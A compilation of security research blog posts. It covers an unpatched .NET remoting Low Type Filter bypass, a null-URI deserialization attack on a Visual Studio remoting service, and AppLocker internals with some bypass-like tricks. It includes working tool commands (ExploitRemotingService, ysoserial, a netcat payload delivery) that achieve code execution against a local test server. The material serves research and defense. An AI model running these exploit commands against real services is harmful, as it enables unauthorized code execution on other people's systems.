I recently added a new feature my .NET remoting exploitation tool which is many cases allow you to exploit an arbitrary service through serialization. This feature has always existed in the tool, if you passed the useser option, however it only worked if the service had enabled Full Type Filter mode, the default for remoting services is Low Type Filter which my tool couldn't easily exploit. I'm going to explain how I bypassed it Low Type Filter mode in the latest tool.

It's worth noting that this technique is currently unpatched, however no one should be using .NET remoting in a modern context (*cough* Visual Studio *cough*).

I'd recommend starting by reading my previous blog post on this subject as it describes where the Type Filtering comes into play. You can also read this MSDN page which describes what can and cannot be deserialized during a .NET remoting call with Low versus Full Type Filtering enabled.

In simple terms enabling Low (which is the default) over Full results in the following restrictions:
  • Object types derived from MarshalByRefObject, DelegateSerializationHolder, ObjRef, IEnvoyInfo and ISponsor can not be deserialized. 
  • All objects which are deserialized must not Demand any CAS permission other than SerializationFormatter permission.
The useser technique abuses the fact that certain classes such as DirectoryInfo and FileInfo are both derived from MarshalByRefObject (MBR) and are also serializable. By deserializing an instance of one of the special classes inside a carefully crafted Hashtable, with a MBR instance of IEqualityComparer you can get the server to pass back the instance. As this object is passed back over a remoting the channel the DirectoryInfo or FileInfo objects are marshalled by reference and are stuck inside the server. We can now call methods on the returned object to read and write arbitrary files, which can use to get full code execution in the server. I've summarized the main interactions in the following diagram:
1, Create DirectoryInfo, 2, Serialize DirectoryInfo, 3, Handle Remoting, 4, Deserialize DirectoryInfo, 5, Marshal By Reference, 6, Capture DirectoryInfo, 7, Create AdminFile.txt, 8, AdminFile.txt created.

Low Type Filter acts to modify the behavior of the BinaryServerFormatterSink block, which encapsulates blocks 3, 4 and 5. The change in behavior blocks the useser technique in three ways.

Firstly in order to get the instance of the special object passed back to the client we need to pass a MBR IEqualityProvider. This will be blocked during handling of the remoting message (3).

Secondly when deserializing an instance of FileInfo or DirectoryInfo (4) a Demand is made for a FileIOPermission for the path to access. As the permission Demand is made during deserialization it hits the restriction that only SerializationFormatter permissions are allowed.

Thirdly, even if the object is deserialized successfully we'll hit a final problem, calling the IEqualityProvider (5 and 6) over a remoting channel to pass back the reference requires setting up a new TCP or Named Pipe connection. Setting up the connection will also hit the limited permissions and again throw an exception causing the call to fail.

How can we work around the three issues? Let's first bypass the type checking which prevents MBR objects being deserialized. If you dig into the code you'll find the type checks are performed in the ObjectReader::CheckSecurity method, which is as follows:

internal void CheckSecurity(ParseRecord pr) {
Type t = pr.PRdtType;
if ((object)t != null){
if(IsRemoting) {
if (typeof(MarshalByRefObject).IsAssignableFrom(t))
throw new ArgumentException();
FormatterServices.CheckTypeSecurity(t, formatterEnums.FEsecurityLevel);
}
}
}

The important thing to note is that the checks are only made if the IsRemoting property is true. What determines the value of the property? Again we can just look in the reference source:

private bool IsRemoting {
get {
return (bMethodCall || bMethodReturn);
}
}

What sets bMethodCall or bMethodReturn? They're set by the BinaryFormatter when it encounters the special MethodCall or MethodReturn record types. It turns out that maybe for performance or security (unclear) the formatter can special case these object types when used in .NET remoting and only storing properties of these objects when serializing and reconstructing the method objects when deserializing.

However if you read my previous blog post you'll notice something, I was unmarshalling a MBR instance of an IMessage, and that didn't hit the checks. This was because as long as the top level record is not a MethodCall or MethodReturn record type then we can deserialize anything we like, that was easy to bypass. In theory we can just pass a serialized Hashtable as the top level object, it'll cause the remoting server code to fault when trying to call methods on the message object but by then it'd be too late. In fact this is exactly what the useser option does anyway, however it's the second security feature which really causes us problems trying to get it to work on Low Type Filter.

When handling an incoming request is enables a PermitOnly CAS grant over the deserialization process, which only allows SerializationFormatter permissions to be asserted. You can see it in action in the reference source here, which I've copied below.

PermissionSet currentPermissionSet = null;                  
if (this.TypeFilterLevel != TypeFilterLevel.Full) {
currentPermissionSet = new PermissionSet(PermissionState.None);
currentPermissionSet.SetPermission(
      new SecurityPermission(
          SecurityPermissionFlag.SerializationFormatter));                    
}

try {
if (currentPermissionSet != null)
currentPermissionSet.PermitOnly();

// Deserialize Request - Stream to IMessage
requestMsg = CoreChannel.DeserializeBinaryRequestMessage(
    objectUri, requestStream, _strictBinding, this.TypeFilterLevel);                    
}
finally {
if (currentPermissionSet != null)
CodeAccessPermission.RevertPermitOnly();
}


As we're passing the Hashtable containing the serialized object we want to capture as well as the MBR IEqualityComparer as the top level object all of our machinations will run during this PermitOnly grant, which as I've already noted will fail. If we could defer the deserialization, or at least any privileged operation until after the CAS grant is reverted we'd be able to exploit this trick, but how can we do that?

One way to defer code execution is to exploit object finalization. Basically when an object's resources are about to be reclaimed by the GC it'll call the object's finalizer. This call is made on a GC thread completely outside the deserialization process and so wouldn't be affected by the CAS PermitOnly grant. In fact abusing finalizers was something I pointed out in my original research on .NET serialization, a good example is the infamous TempFileCollection class.

I thought about trying to find a useful gadget to exploit this, however there were two problems. First the difficulty in finding a suitable object which is both serializable and has a useful finalizer defined and second, the call to the finalizer is non-deterministic as it's whenever the GC gets called. In theory the GC might never be called.

I decided to focus on a different approach based on a non-obvious observation. The PermitOnly security behaviors of Low Type Filter only apply when calling a method on a server object, not deserializing the return value. Therefore if I could find somewhere in the server which calls back to a MBR object I control then I can force the server to deserialize an arbitrary object. This object can be used to mount the attack as the deserialization would not occur under the PermitOnly CAS grant and I can use the same Hashtable trick to capture a DirectoryInfo or FileInfo object.

In theory you could find an exposed method on the server object to use for this callback, however I wanted my code to be generic and not require knowledge of the server object outside of the knowing the URI. Therefore it'd have to be a method we can call on the MBR or base Object class. An initial look only shows one candidate, the Object::Equals method which takes a single parameter. Unfortunately most of the time a server object won't override this method and the default just performs reference equality which doesn't call any methods on the passed object.

The only other candidates are the InitializeLifetimeServer or GetLifetimeService methods which  return an MBR which implements the ILease interface. I'm not going to go into what this is used for (you can read up on it on MSDN) but what I noticed was the ILease interface has a Register method which takes an object which implements ISponsor interface. If you registered an MBR object in the client with the server's lifetime service then when the server wants to check if the object should be destroyed it'll call the ISponsor::Renewal method, which gives us our callback. While the method doesn't return an object, we can just throw an exception with the Hashtable inside and exploit the service. Victory?

Not quite, it turns out that we've now got new problems. The first one is the Renewal call only happens when the lifetime counter expires, the default timeout is around 10 minutes from the last call to the server. This means that our exploit will only run at some long, potentially indeterminate point in time. Not the end of the world, but as frustrating as waiting for a GC run to get a finalizer executed. But the second problem seems more insurmountable, in order to set the ISponsor object we need to make an actual call to the server, however Low Type Filter would stop us from passing an MBR ISponsor object as the top level object would be a MethodCall record type which would throw an exception when it was encountered during argument deserialization.

What can we do? Turns out there's an easy way around this, the framework provides us with a full serializable MethodCall class. Instead of using the MethodCall record type we can instead package up a serializable MethodCall object as the top level object with all the data needed to make the call to Register. As the top level object is using a normal serialized object record type and not a MethodCall record type it'll never trigger the type checking and we can call Register with our MBR ISponsor object.

You might wonder if there's another problem here, won't deserializing the MBR cause the channel to be created and hit the PermitOnly CAS grant? Fortunately channel setup is deferred until a call is made on the object, therefore as long as no call is made to the MBR object during the deserialization process we'll be out of the CAS grant and able to setup the channel when the Renewal method is called.

We now have a way of exploiting the remoting service without knowledge of any specific methods on the server object, the only problem is we might need to wait 10 minutes to do it. Can we improve on the time? Digging further into default remoting implementation I noticed that if an argument being passed to a method isn't directly of the required type the method StackBuilderSink::SyncProcessMessage will call Message::CoerceArgs to try the coerce the argument to the correct type. The fallback is to call Convert::ChangeType passing the needed type and the object passed from the client. To convert to the correct type the code will see if the passed object implements the IConvertible interface and call the ToType method on it. Therefore, instead of passing an implementation of ISponsor to Register we just pass one which implements IConvertible the remoting code will try and coerce it using ChangeType which will give us our needed callback immediately without waiting 10 minutes. I've summarized the attack in the following diagram:

1, Call ILease::Register, 2, Handle Message, 3 Coerce Arguments, 4, Create DirectoryInfo, 5, Deserialize DirectoryInfo, 6, Marshal DirectoryInfo, 7, Capture DirectoryInfo, 8 Create AdminFile.

This entire exploit is implemented behind the uselease option. It works in the same way as useser but should work even if the server is running Low Type Filter mode. Of course there's caveats, this only works if the server sets up a bi-direction channel, if it registers a TcpChannel or IpcChannel then that should be fine, but if it just sets up a TcpServerChannel it might not work. Also you still need to know the URI of the server and bypass any authentication requirements.

If you want to try it out grab the code from github and compile it. First run the ExampleRemotingServer with the following command line:

ExampleRemotingService.exe -t low

This will run the example service with Low Type Filter. Now you can try useser with the following command line:

ExploitRemotingService.exe --useser tcp://127.0.0.1:12345/RemotingServer ls c:\

You should notice it fails. Now change useser to uselease and rerun the command:

ExploitRemotingService.exe --uselease tcp://127.0.0.1:12345/RemotingServer ls c:\

You should see a directory listing of the C: drive. Finally if you pass the autodir option the exploit tool will try and upload an assembly to the server's base directory and bootstrap a full server from which you can call other commands such as exec.

ExploitRemotingService.exe --uselease --autodir tcp://127.0.0.1:12345/RemotingServer exec notepad

If it all works you should find the example server will spawn notepad. This works on a fully up to date version of .NET (e.g. .NET 4.8).

The take away from this is DO NOT EVER USE .NET REMOTING IN PRODUCTION. Even if you're lucky and you're not exploitable for some reason the technologies should be completely deprecated and (presumably) will never be ported .NET Core.

The Ethereal Beauty of a Missing Header

Skip to the end if you don't want to listen to me regaling you with a mostly made up story :-)

It was a dark and stormy night, as cliches goes you might as well go with a classic. With little else to occupy my time I booted my PC and awoke my trusted companion Wireshark (née Ethereal) and look what communications were being lost to time due to the impermanence of localhost. Hey, don't judge me, I wrote a book on it remember?

Observing the pastel shaded runes flashing before my eyes I divined a new understanding of that which remains hidden from a mortal's gaze. As if a metaphor for our existence I observed the BITS service shouting into void, desperately trying to ask a question of the WinRM service that will never be answered. In an instant something else caught my eye, unrelated to the intelligence or lack thereof of data transfers. As the hex flickered across my screen I realized in horror what it was; it's grim visage staring at me like some horrible ghost of the past. What I saw both repulsed and excited me, here was something I could reason about:

Screenshot from wireshark showing .NET remoting network traffic which has a .NET magic at the start.

Those three little characters, .NET,  reverberated in my mind, almost as if the computer was repeating a forbidden soliloquy on the assumption it wouldn't be overheard. Here in the year, 2019, I shouldn't expect to read such a subversive codex as this. What malfeasance had my Operating System undertaken to spout such vulgar prose. It was a horrible night to find the .NET Remoting protocol.

It's said [citation needed], "Eternal damnation is reserved for evil people and developers who use insecure deprecated technologies," if such a distinction could be made between the two. Whomever was not paying attention to MSDN was clearly up to no good. I made the decision to track down the source of this abomination and bring them to justice. As with all high crimes, evidence of misdeeds is meaningless without suspects; assuming the perpetrator was still around I did what all good detectives do, used my position of authority (an Admin Command Prompt) and interrogated every shifty character who was hanging around the local neighborhood. Or at least I looked up the listening TCP ports using netstat with the -b switch to print the guilty party. Two suspects came immediately to light:

C:\> netstat -p TCP -nqb
....
TCP    127.0.0.1:51889        0.0.0.0:0              LISTENING
[devenv.exe]
TCP    127.0.0.1:51890        0.0.0.0:0              LISTENING
[Microsoft.Alm.Shared.Remoting.RemoteContainer.dll]

Caught red-handed, I moved in to apprehend them. Unfortunately, devenv (records indicate is an alias for Mr Visual Studio 2017 Esp, a cad of some notoriety) was too unwieldy to subdue. However his partner in crime was not so blessed and easily fell within my clutches. Dragging him back to the (work)station I subjected the rogue, whom I nicknamed Al due to his long, unpronounceable name, to a thorough interrogation. He easily confessed his secrets, with application of a bit of decompilation, part of which I've reproduced below for the edification of the reader:

public static IRemotingChannel RegisterRemotingChannel(
                               string portName) {
    var sinkProvider = new BinaryServerFormatterSinkProvider
    {
        TypeFilterLevel = TypeFilterLevel.Full
    };
    var properties = new Dictionary<string, object> {
        { "name", portName },
        { "port", 0 },
        { "rejectRemoteRequests", true }
    };
    var channel = new TcpServerChannel(properties, sinkProvider);
    return new RemotingChannel(channel, 
            () => channel.GetChannelUri());
}

Of course, the use of .NET Remoting had Al bang to rights, but even if a judge decided that wasn't sufficient of crime I could also charge him with using a TCP channel with no authentication and enabling a Full Type Filter mode. I asked Al to explain himself, so speaking in a cod, 18th Century Cockney accent (even though his identification was clearly of a man from the west coast of the United States of America) he tried to do so:

Moi: Didn't you know what you were doing was a crime against local security?
Al: Sure Guv'na, but devy told me that'd his bleedin' plan couldn't be exploited?
M: In what way did your mate 'devy' claim such a thing was possible?
A: Well for one, we'd not set a pre-agreed port to talk to us on. [Presumably referring to the use of port '0' which automatically allocates a random port].
M: But I found your port, it wasn't hard to do as I could hear you talking between yourselves. Surely he had a better plan that?
A: Well, we don't trust the scum from outside the neighborhood, we only trusted people locally. [This was the meaning of rejectRemoteRequests which ensures it only bind the port to localhost].
M: I'm surprised you trust everyone locally? What about other ne'er-do-wells logged on to the same machine but in different sessions?
A: See coppa' we thought of that, in order to talk to me or devy you'd need to know our secret code word, without that you ain't gettin' nowt. [the portName presumably].

This final answer stumped me, sure they weren't authenticating each other but at least if the code word was unguessable it'd be hard to exploit them. Further investigation indicated their secret code word was a randomly generated Globally Unique Identifier which would be almost impossible to forge. Maybe I'd have to let Al free after all?

But something gnawed at me, neither Al or Devy were very bright, there must be more to this story. After further pressing, Al confessed that he never remembered the code word, and instead had a friend, BinaryServerFormatterSink (Binny to those in a similar trade) verify it for them using the following check:

string objectUri = wkRequestHeaders.RequestUri;
           
if (objectUri != lastUri 
    && RemotingServices.GetServerTypeForUri(objectUri) == null)
                    throw new RemotingException();
                
lastUri = objectUri;

I realized that'd I'd got him. Binny was lazy, he remembered the last code word (lastUri) he'd been given and stored it away for safekeeping . If no one had ever talked to Al before then Binny didn't yet know the code word, you couldn't given him a random one but if you don't give him a code word at all then lastUri would equal objectUri because both were set to null. This whole scheme had come crashing down on their heads.

I reported Binny to the authorities (via a certain Chief Constable Dorrans) but they seemed to be little interested in making the perpetrator change their ways. I made a note in my log book (ExploitRemotingServices) and continued on my way, satisfied in a job well done, sort of.

The Less Wankery, Useful, Technical Bit

TL;DR; for some reason Visual Studio 2017 (and possibly 2019) has code which specifically uses .NET remoting in a fairly insecure way. It doesn't do authentication, it uses TCP for no obvious reason and it sets the type filter mode to Full which means it'd be trivially vulnerable to serialization attacks (see blog posts passim). However, on a positive note it does bind to localhost only, which will ensure it's not remotely exploitable and it chooses to generate a random service name, from a GUID, which makes it almost impossible to guess or brute force.

Therefore, it's basically unexploitable outside a difficult to win race condition and only if the attacker is on the same machine as the user running Visual Studio. I don't like those odds, so I never seriously considered reporting it to MSRC.

Why I am even blogging about it? It's all to do with the fact that you can not specify the URI, and as long a no one has previously connected to the service successfully then you can reach the call to BinaryFormatter::Deserialize and potentially get arbitrary code execution.  This might be especially interesting if you're running a pentesting engagement and you find an exposed .NET remoting service but do not have a copy of the client or server with which to extract the appropriate URI to make a call.

How would you know if you do find such a service? If you send garbage to a .NET remoting service (at least not in secure mode) it will respond with the previously mentioned magic ".NET" signature data, as show in the following screenshot from Wireshark:

Screen shot of Wireshark following connection. The string Boo! is sent to the server which responds with .NET remoting protocol.

When combined with the fact that the .NET remoting protocol doesn't require any negotiation (again assuming no secure mode) we can create a simple payload which would exploit any .NET remoting server assuming we have a suitable serialization payload, the server is running in Full type filter mode and nothing has previously connected to the service.

Let's put that payload together. You'll need the latest ExploitRemotingService from GitHub and also a copy of ysoserial.net to generate a serialization payload.  First run the following ysoserial comment to generate a simple TypeConfuseDelegate which will start notepad when deserialized and write the raw data to the file run_notepad.bin:

ysoserial.exe -f BinaryFormatter -o raw -g TypeConfuseDelegate -c notepad > run_notepad.bin

Now run ExploitRemotingService, ensuring you pass both the --nulluri option and the --path to output the request to a file and use the raw command with the run_notepad.bin file:

ExploitRemotingService.exe --nulluri --path request.bin tcp://127.0.0.1:1234/RemotingServer raw run_notepad.bin

You'll now have a file which looks like the following:

Hex dump of request.bin.

Normally before the serialized data there should be the URI for the remoting service (as shown in the first screenshot of this blog post), which is not present in this file. We can now test this out, run the ExampleRemotingService with the following command line, binding to port 1234 and running with Full type filter mode:

ExampleRemotingService.exe -p 1234 -t full

Using your favorite testing tool, such as netcat, just dump the file to TCP port 1234:

nc 127.0.0.1 1234 < request.bin

If everything is correct, you'll find notepad starts. If it doesn't work ensure you've built ExampleRemotingService as a .NET 4 binary otherwise the serialization payload won't execute.

What if the service has been connected to before and so the last URI has been set? One trick would be to find a way of causing the server to crash *cough* but that's out of the scope of this blog post. If anyone fancies adding a new plugin to ysoserial to generate the raw payload rather than needing two tools, then be my guest.

I think it's worth stressing, once again, that you really should not be using .NET remoting on anything you care about. I'd be interested to find out if anyone manages to use this technique on a real engagement.

The Internals of AppLocker - Part 1 - Overview and Setup

This is part 1 in a short series on the internals of AppLocker (AL). Part 2 is here, part 3 here and part 4 here.

AppLocker (AL) is a feature added to Windows 7 Enterprise and above as a more comprehensive application white-listing solution over the older Software Restriction Policies (SRP). When configured it's capable of blocking the creation of processes using various different rules, such as the application path as well as optionally blocking DLLs, script code, MSI installers etc. Technology wise it's slowly being replaced by the more robust Windows Defender Application Control (WDAC) which was born out of User Mode Code Integrity (UMCI), however at the moment AL is still easier to configure in an enterprise environment. It's considered a "Defense in Depth" feature according to MSRC's security servicing criteria so unless you find a bug which gives you EoP or RCE it's not something Microsoft will fix with a security bulletin.

It's common to find documentation on configuring AL, even in bypassing it (see for example Oddvar Moe's case study series from his website) however the inner workings are usually harder to find. Some examples of documentation which go some way towards documenting AL internals that I could find are:
However even these articles don't really give the full details. Therefore, I thought I'd dig a little deeper into some of the inner workings of AL, specifically focusing on the relationship between user access tokens and the applied rules. I'm not going to talk about configuration (outside of a quick setup for demonstration purposes) and I'm not really going to talk about bypasses. However, I will also pass on some dumb tricks you can do with an AL configured system which might be "bypass-like". Also note that this is documenting the behavior on Windows 10 1909 Enterprise. The internals might and almost certainly are different on other versions of Windows.

Let's start with a basic overview of the various components and give a super quick setup guide for a basic AL enabled Windows 10 1909 Enterprise installation so that we can try things out in subsequent parts.

Component Overview

AL uses a combination of a kernel driver (APPID.SYS) and user mode service (APPIDSVC). The introduction of kernel code is what distinguishes it from the old SRP which was entirely enforced in user mode, and so wasn't too difficult to bypass. The kernel driver's primary role is to handle blocking process creation through a Process Notification Callback as well as provide some general services. The user mode service on the other hand is more of a helper to do things which are difficult or impractical in the kernel, such as comprehensive code signature verification. That said looking at the implementation I think the majority could be done entirely in kernel mode considering that's what the Code Integrity (CI) module already does.

For DLL, Script and MSI enforcement various user-mode components access the SAFER APIs to determine whether code should run. The SAFER APIs might then call into the kernel driver or into the service over RPC depending on what it needs to do. I've summarized the various links in the following diagram.

The various interactions between components in AppLocker.

Setting up a Test System

I started by installing Windows 10 1909 Enterprise from an MSDN ISO. If you don't have MSDN access you get a trial Dev Environment VM from Microsoft which runs Windows 10 Enterprise. At the time of writing it's only 1903, but that's probably good enough, you should even be able to update to 1909 if you so desire. Then follow the next steps:
  1. Startup the VM and login as an administrator, then run an admin PowerShell console.
  2. Download the Default AppLocker Policy file from GitHub and save it as policy.xml.
  3. Run the PowerShell command "Set-AppLockerPolicy -XmlPolicy policy.xml".
  4. Run the command "sc.exe config appidsvc start= auto".
  5. Reboot the VM. 
This will install a simple default policy then enables the Application Identity Service. The policy is as follows:
  • EXE Rules
    • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to run any executable from anywhere.
  • DLL Rules
    • Allow Everyone group access to load any DLL under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to load a DLL from anywhere.
  • APPX Rules (Packages Applications, think store applications)
    • Allow Everyone to load any signed, packaged application .
Of course these rules are terrible and no one should actually use them, I've just presented them for the purposes of this blog post series.

Where is the policy configuration stored? There's some data in the registry, but the core of the policy configuration is stored the directory %WINDIR%\SYSTEM32\APPLOCKER, separated by type. For example the executable configuration is in EXE.APPLOCKER, the other names should be self explanatory. When the files in this directory are modified a call is made to the driver to reload the policy configuration. If we take a look at one of these files in a hex editor you'll find they're nothing like the XML policy we put in (as shown below), we'll come back to what these files actually contain in part 3 of this blog series.

Hex dump of the Exe.Applocker file which shows only binary data, no XML.

Once you reboot the VM the service will be running and AL will now be enforced. If you login with the administrator again and copy an executable to their Desktop folder, a location not allowed by policy, and run the executable you'll find, it works... You might think this makes sense generally, the user is an administrator which should be allowed to execute everything from anywhere, however the default administrator is a UAC split token admin, so the default "user" wouldn't have the Administrators group and so shouldn't be allowed to run code from anywhere? We'll get back to why this works in part 3.

To check AL is working create a new user (say using the New-LocalUser PowerShell command) and do not assign them to the local administrators group. Login as the new user and try copying and running the executable on the desktop again. You should be greeted with a suitable error dialog.

AppLocker error showing executable has been blocked from running.

It should be noted that even if you just enable the APPID driver AL won't be enforced, the service needs to be running for everything to be correctly enabled. You might assume you can just disable the service as an administrator and turn off AL trivially? Well about that...

C:\> sc.exe config appidsvc start= demand
[SC] ChangeServiceConfig FAILED 5:

Access is denied.

Seems you can't reconfigure the service back to demand start (its initial start mode) once you've auto started it. The answer to why you're given access denied is simple:

C:\> sc.exe qprotection appidsvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE appidsvc PROTECTION LEVEL: WINDOWS LIGHT.

On Windows 10 (I've not checked 8.1) the AppID service runs as PPL. This means the Service Control Manager (SCM) prevents "normal" administrators from tampering with the service, such as disabling it or stopping it. I really don't see why Microsoft did this, there's SO many different ways to compromise AppLocker's function as an administrator it's not funny, disabling the service should presumably be the least of your worries. Oh well, of course in this case if you really must disable the service at run time you can use the Task Scheduler trick I showed in September to run some commands as TrustedInstaller, which happens to be a backdoor into the SCM. Try running the following PowerShell script as an administrator:

That's all for now, in part 2 we'll dig into how the Executable enforcement works under the hood.


The Internals of AppLocker - Part 2 - Blocking Process Creation

This is part 2 in a short series on the internals of AppLocker (AL). Part 1 is here, part 3 here and part 4 here.

In the previous blog post I briefly discussed the architecture of AppLocker (AL) and how to setup a really basic test system based on Windows 10 1909 Enterprise. This time I'm going to start going into more depth about how AL blocks the creation of processes which are not permitted by policy. I'll reiterate in case you've forgotten that what I'm describing is the internals on Windows 10 1909, the details can and also certainly are different on other operating systems.

How Can You Block Process Creation?

When the APPID driver starts it registers a process notification callback with the PsSetCreateProcessNotifyRoutineEx API. A process notification callback can return an error code by assigning to the CreationStatus field of the PS_CREATE_NOTIFY_INFO structure to block process creation. If the kernel detects a callback setting an error code then the process is immediately terminated by calling PsTerminateProcess.

An interesting observation is that the process notification callback is NOT called when the process object is created. It's actually called when the first thread is inserted into the process. The callback is made in the context of the thread creating the new thread, which is usually the thread creating the process, but it doesn't have to be. If you look in the PspInsertThread function in the kernel you'll find code which looks like the following:

if (++Process->ActiveThreads == 1)
  CurrentFlags |= FLAG_FIRST_THREAD;
// ...
if (CurrentFlags & FLAG_FIRST_THREAD) {
  if (!Process->Flags3.Minimal || Process->PicoContext)
    PspCallProcessNotifyRoutines(Process);
}

This code first increments the active thread count for the process. If the current count is 1 then a flag is set for use later in the function. Further on the call is made to PspCallProcessNotifyRoutines to invoke the registered callbacks, which is where the APPID callback will be invoked.

The fact the callback seems to be called at process creation time is due to most processes being created using NtCreateUserProcess which does both the process and the initial thread creation as one operation. However you could call NtCreateProcessEx to create a new process and that will be successful, just, in theory, you could never insert a thread into it without triggering the notification. Whether there's a race condition here, where you could get ActiveThreadCount to never be 1 I wouldn't like to say, almost certainly there's a process lock which would prevent it.

The behavior of blocking process creation after the process has been created is the key difference between WDAC and AL. WDAC prevents the creation of any executable code which doesn't meet the defined policy, therefore if you try and create a process with an executable file which doesn't match the policy it'll fail very early in process creation. However AL will allow you to create a process, doing many of the initialization tasks, and only once a thread is inserted into the process will the rug be pulled away.

The use of the process notification callback does have one current weakness, it doesn't work on Windows Subsystem for Linux processes. And when I say it doesn't work the APPID callback never gets invoked, and as process creation is blocked by invoking the callback this means any WSL process will run unmolested.

It isn't anything to do with the the checks for Minimal/PicoContext in the code above (or seemingly due to image formats as Alex Ionescu mentioned in his talk on WSL although that might be why AL doesn;t even try), but it's due to the way the APPID driver has enabled its notification callback. Specifically APPID calls the PsSetCreateProcessNotifyRoutineEx method, however this will not generate callbacks for WSL processes. Instead APPID needs to use PsSetCreateProcessNotifyRoutineEx2 to get callbacks for WSL processes. While it's probably not worth MS implementing actual AL support for WSL processes I'm surprised they don't give an option to block outright rather than just allowing anything to run.

Why Does AppLocker Decide to Block a Process?

We now know how process creation is blocked, but we don't know why AL decides a process should be blocked. Of course we have our configured rules which much be enforced somehow. Each rule consists of three parts:
  1. Whether the rule allows the process to be created or whether it denies creation.
  2. The User or Group the rule applies to.
  3. The property that the rule checks for, this could be an executable path, the hash of the executable file or publisher certificate and version information. A simple path example is "%WINDIR%\*" which allows any executable to run as long as it's located under the Windows Directory.
Let's dig into the APPID process notification callback, AiProcessNotifyRoutine, to find out what is actually happening, the simplified code is below:

void AiProcessNotifyRoutine(PEPROCESS Process, 
                HANDLE ProcessId, 
PPS_CREATE_NOTIFY_INFO CreateInfo) {
  PUNICODE_STRING ImageFileName;
  if (CreateInfo->FileOpenNameAvailable)
    ImageFileName = CreateInfo->ImageFileName;
  else
    SeLocateProcessImageName(Process, 
                             &ImageFileName);

  CreateInfo->CreationStatus = AipCreateProcessNotifyRoutine(
             ProcessId, ImageFileName, 
             CreateInfo->FileObject, 
             Process, CreateInfo);
}

The first thing the callback does is extract the path to the executable image for the process being checked. The PS_CREATE_NOTIFY_INFO structure passed to the callback can contain the image file path if the FileOpenNameAvailable flag is set. However there are situations where this flag is not set (such as in WSL) in which case the code gets the path using SeLocateProcessImageName. We know that having the full image path is important as that's one of the main selection criteria in the AL rule sets.

The next call is to the inner function, AipCreateProcessNotifyRoutine. The returned status code from this function is assigned to CreationStatus so if this function fails then the process will be terminatedThere's a lot going on in this function, I'm going to simplify it as much as I can to get the basic gist of what's going on while glossing over some features such as AppX support and Smart Locker (though they might come back in a later blog post). For now it looks like the following:

NTSTATUS AipCreateProcessNotifyRoutine(
        HANDLE ProcessId, 
        PUNICODE_STRING ImageFileName, 
        PFILE_OBJECT ImageFileObject, 
        PVOID Process, 
        PPS_CREATE_NOTIFY_INFO CreateInfo) {

    POLICY* policy = SrpGetPolicy();
    if (!policy)
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    
    HANDLE ProcessToken;
    HANDLE AccessCheckToken;
    
    AiGetTokens(ProcessId, &ProcessToken, &AccessCheckToken);

    if (AiIsTokenSandBoxed(ProcessToken))
        return STATUS_SUCCESS;

    BOOLEAN ServiceToken = SrpIsTokenService(ProcessToken);
    if (SrpServiceBypass(Policy, ServiceToken, 0, TRUE))
        return STATUS_SUCCESS;
    
    HANDLE FileHandle;
    AiOpenImageFile(ImageFileName,
                    ImageFileObject, 
                    &FileHandle);
    AiSetAttributesExe(Policy, FileHandle, 
                       ProcessToken, AccessCheckToken);
    
    NTSTATUS result = SrppAccessCheck(
                      AccessCheckToken,
                      Policy);
    
    if (!NT_SUCCESS(result)) {
        AiLogFileAndStatusEvent(...);
        if (Policy->AuditOnly)
            result = STATUS_SUCCESS;
    }
    
    return result;
}

A lot to unpack here, be we can start at the beginning. The first thing the code does is request the current global policy object. If there doesn't exist a configured policy then the status code STATUS_ACCESS_DISABLED_BY_POLICY_OTHER is returned. You'll see this status code come up a lot when the process is blocked. Normally even if AL isn't enabled there's still a policy object, it'll just be configured to not block anything. I could imagine if somehow there was no global policy then every process creation would fail, which would not be good.

Next we get into the core of the check, first with a call to the function AiGetTokens. This functions opens a handle to the target process' access token based on its PID (why it doesn't just use the Process object from the PS_CREATE_NOTIFY_INFO structure escapes me, but this is probably just legacy code). It also returns a second token handle, the access check token, we'll see how this is important later.

The code then checks two things based on the process token. First it checks if the token is AiIsTokenSandBoxed. Unfortunately this is badly named, at least in a modern context as it doesn't refer to whether the token is a restricted token such as used in web browser sandboxes. What this is actually checking is whether the token has the Sandbox Inert flag set. One way of setting this flag is by calling CreateRestrictedToken passing the SANDBOX_INERT flag. Since Windows 8, or Windows with KB2532445 installed the "caller must be running as LocalSystem or TrustedInstaller or the system ignores this flag" according to the documentation. The documentation isn't entirely correct on this point, if you go and look at the implementation in NtFilterToken you'll find you can also set the flag if you're have the SERVICE SID, which is basically all services regardless of type. The result of this check is if the process token has the Sandbox Inert flag set then a success code is returned and AL is bypassed for this new process.

The second check determines if the token is a service token, first calling SrpIsTokenService to get a true or false value, then calls SrpServiceBypass to determine if the current policy allows service tokens to bypass the policy as well. If SrpServiceBypass returns true then the callback also returns a success code bypassing AL. However it seems it is possible to configure AL to enforce process checks on service processes, however I can't for the life of me find the documentation for this setting. It's probably far too dangerous a setting to allow the average sysadmin to use.

What's considered a service context is very similar to setting the Sandbox Inert flag with CreateRestrictedToken. If you have one of the following groups in the process token it's considered a service:

NT AUTHORITY\SYSTEM
NT AUTHORITY\SERVICE
NT AUTHORITY\RESTRICTED
NT AUTHORITY\WRITE RESTRICTED

The last two groups are only used to allow for services running as restricted or write restricted. Without them access would not be granted in the service check and AL might end being enforced when it shouldn't.

With that out of the way, we now get on to the meat of the checking process. First the code opens a handle to the main executable's file object. Access to the file will be needed if the rules such as hash or publisher certificate are used. It'll open the file even if those rules are being used, just in case. Next a call is made to AiSetAttributesExe which takes the access token handles, the policy and the file handle. This must do something magical, but being the tease I am we'll leave this for now.  Finally in this section a call is made to SrppAccessCheck which as its name suggests is doing the access check again the policy for whether this process is allowed to be created. Note that only the access check token is passed, not the process token.

The use of an access check, verifying a Security Descriptor against an Access Token makes perfect sense when you think of how rules are structured. The allow and deny rules correspond well to allow or deny ACEs for specific group SIDs. How the rule specification such as path restrictions are enforced is less clear but we'll leave the details of this for next time.

The result of the access check is the status code returned from AipCreateProcessNotifyRoutine which ends up being set to the CreationStatus field in the notification structure which can terminate the process. We can assume that this result will either be a success or an error code such as STATUS_ACCESS_DISABLED_BY_POLICY_OTHER. 

One final step is necessary, logging an event if the access check failed. If the result of the access check is an error, but the policy is currently configured in Audit Only mode, i.e. not enforcing AL process creation then the log entry will be made but the status code is reset back to a success so that the kernel will not terminate the process.

Testing System Behavior

Before we go let's test the behavior that we can create a process which is against the configured policy, as long as there's no threads in it. This is probably not a useful behavior but it's always good to try and verify your assumptions about reverse engineered code.

